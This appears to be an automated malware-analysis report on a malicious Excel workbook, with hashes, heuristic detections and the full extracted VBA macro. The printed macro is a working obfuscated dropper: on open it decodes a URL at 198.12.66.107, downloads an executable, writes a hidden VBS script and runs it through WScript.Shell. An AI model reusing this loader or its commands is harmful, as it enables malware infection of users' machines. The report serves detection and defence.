Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 23a7020a78c4980d…

MALICIOUS

Office (OOXML)

44.5 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-06-01
MD5: b5ad9ed8741cb36113fdcd1c86e2602f SHA-1: 9f149954285159cf257bf7440a56998126a5495b SHA-256: 23a7020a78c4980d5e63d1ca66f5f16807d6da06839030dc02156eebf59f8a71
632 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The OOXML document contains a VBA macro with an Auto_Open subroutine that utilizes WScript.Shell to execute a command. This command is a Base64-decoded stager that downloads a second-stage executable from the URL http://198.12.66.107/gxDzvIK.exe. The presence of the Equation Editor OLE object and the ClamAV detection further support its malicious nature as a dropper.

Heuristics 15

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • ClamAV: Xls.Dropper.Agent-7654328-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7654328-0
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    s = s + "       sWScript = sWScript + "".""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       Execute(""l=m"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Application.Execute (Selection.Font.Name = "Arial"): Set gfdgfdgdf = Nothing
Path = "C:\Windows\System32\wscript.exe "
File = x + ":script1"
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://198.12.66.107/gxDzvIK.exe Referenced by macro

Extracted artifacts 9

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 14744 bytes
SHA-256: e556f3ccba07c1850831d3d6aeec8e918238fb0da99187f043787920418f1269
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf
s = s + "fsdfdsfs = ""aHR0cDovLzE5OC4xMi42Ni4xMDcvZ3hEenZJSy5leGU="" " + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky =""ZW1kamhma2YuZXhl""" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = ""bin""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""."" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""base""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""64"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim after, path'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "after = ""later"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE) '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    novarue = ""Node""" + vbCrLf
s = s + "    Execute(""novarue = novarue + """"TypedValue"""""")" + vbCrLf
s = s + "    Execute(""byteArray = alxmd."" + novarue)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Someone I know recently combined Maple Syrup & buttered Popcorn thinking it would taste like caramel popcorn. It didn’t and they don’t recommend anyone else do it either.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        filestring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            'It would have been a better night if the guys next to us weren't in the splash zone.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            filestring = baax.ReadText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub tse64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Use an aux. XML document with a Base64-encoded element. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' available via .todeTypedValue, which we can pass to BytesToStr() '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    novarue = ""Node""" + vbCrLf
s = s + "    Execute(""novarue = novarue + """"TypedValue"""""")" + vbCrLf
s = s + "    Execute(""byteArray = alxmd."" + novarue)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' UTF-16 LE happens to be VBScript's internal encoding, so we can'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' take a shortcut and use CStr() to directly convert the byte array'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' to a string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        linkstring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' Now change the type to text, set the encoding, and output the 'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' result as text. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            linkstring = baax.ReadText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call ase64Decode(yulkytjtrhtjrkdsarjky,False) 'filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call tse64Decode(fsdfdsfs,False) 'linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub HTxTPDownload( aa, bb )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   cobvar = ""Scripting.FileSystemObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Set fso = CreateObject(cobvar) '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = ""C:""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\program""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""data""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\asc.txt""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   If (fso.FileExists(path)) Then '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "     fso.DeleteFile(path)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" exists.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      Execute(""MyURL=aa:MyPath=bb"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      sWScript = ""WScript""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       sWScript = sWScript + "".""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       Execute(""l=m"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       set just_obj = CreateObject(l)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" doesn't exist.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim i, objFile, objFSO, objHTTP, strFile, strMsg'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Const ForReading = 1, ForWriting = 2, ForAppending = 8 '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objFSO = CreateObject(cobvar)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If objFSO.FolderExists( myPath ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) + 1 ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, ""\"" ) - 1 ) ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        'If any cop asks you where you were, just say you were visiting Kansas.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = myPath'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        Exit Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   'Set objHTTP = CreateObject( ""Microsoft.XMLHTTP"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   dim stream_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   ado = ""ADODB.Stream"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   set stream_obj = CreateObject(ado)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""objHT"" + ""TP."" + ""Open """"GET"""", myURL, False"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    objHTTP.Send'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.type = 1'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj."" + ""open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.write objHTTP.ResponseBody '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj.save"" + ""tofile strFile, 2"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Write the  byte stream to the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'For i = 1 To LenB( objHTTP.ResponseBody )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    '    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Next'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Close the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'objFile.Close( )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "End Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = ""C:"" + ""\Program"" + ""Data\"" + yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "fsdfdsfs = linkstring '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "HTxTPDownload fsdfdsfs, yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim just_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "RUNC = yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Execute(""just_obj."" + ""exec RUNC"")" + vbCrLf

    On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)

    'If Error WS Does not exist
    If Err.Number <> 0 Then
        DoesWSExist = False
    Else '37491
        DoesWSExist = True '37491
    End If
 
    On Error GoTo -1
j = ".S" + "hell"
Range("A1:C1").Select

Selection.Font.Name = "Arial" '37491
Selection.Font.Bold = True
Selection.Font.Italic = True
Selection.Interior.Color = vbGreen
xzxz = "Ws" + "cr" + "ipt" + j
x = "C:"
x = x + "\program"
x = x + "data"
x = x + "\asc.txt"
Dim i As Integer
On Error GoTo Last
'ii = InputBox("Enter Value", "Enter Serial Numbers")
For i = 1 To i
ActiveCell.Offset(1, 0).Activate
Next i
Last:

On Error GoTo Handler '37491
Application.EnableEvents = False

Handler:
Dim gfdgfdgdf As Object
sdfsdfs = "Scri"
sdfsdfs = sdfsdfs + "pting."
smallvar = "File"
smallvar = smallvar + "SystemObject" '37491

Set gfdgfdgdf = CreateObject(sdfsdfs + smallvar)
Dim oFile As Object
'Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37491
Set oFile = gfdgfdgdf.CreateTextFile(x + ":script1" + ".vbs")
    On Error Resume Next

    
    'If Error WS Does not exist
    If Err.Number <> 0 Then

    End If
 
    On Error GoTo -1
Application.Execute ("oFile.WriteLine s"): oFile.WriteLine s '#############################
'oFile.Close
Application.Execute (Selection.Font.Name = "Arial"): Set gfdgfdgdf = Nothing
Path = "C:\Windows\System32\wscript.exe "
File = x + ":script1"
File = File + "." + "vb"
File = File + "s"

'The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.:x = Shell(Path + " " + File, vbNormalFocus)
x = Shell(Path + File, vbNormalFocus) ''The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.

End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject2.bin 9216 bytes
SHA-256: 1aa8fe16fc37c60e58858c7816b36e5bc6087af2c77fa2f90e29a80a7b0cb698
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37491, WScript = sWScript + "."
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native 6349 bytes
SHA-256: 7c78a294575572e3258338725a7e19a7db13ffe34f092b24d024ddfa35f3b2f9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37491, WScript = sWScript + "."
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject3.bin 5936 bytes
SHA-256: 6cd73f15b74e03d90e8d8f88ec9cbb3032bafeefc1026727883d9f3cc83c62b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): cmd /c ren %tmp%\yy y.js&CSCRIPT %tmp%\y.js  C
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 3584 bytes
SHA-256: 3c4b6effdfb24f16970eeae6674574f82fc27622256008fbf003fc9f7aa61cfb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_02_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 939 bytes
SHA-256: d8a67d6a3a775520ff29e6d5b483b0b19b557e7510062596622ebb6b19e5c0df
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: xl/vbaProject.bin 35328 bytes
SHA-256: b55e1cd120969204c259d1b1a415027a5aabd28a9a04e668e7c7e73287d13c29
Detection
ClamAV: Xls.Dropper.Agent-7654328-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript = "WScript"'hu4u4hu4uh4uhu4hu4, WScript = sWScript + "."'hu4u4hu4uh4uhu4hu4, WScript + "Shell"'hu4u4hu4uh4uhu4hu4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f

Open this report in the interactive analyzer, or submit your own file for analysis.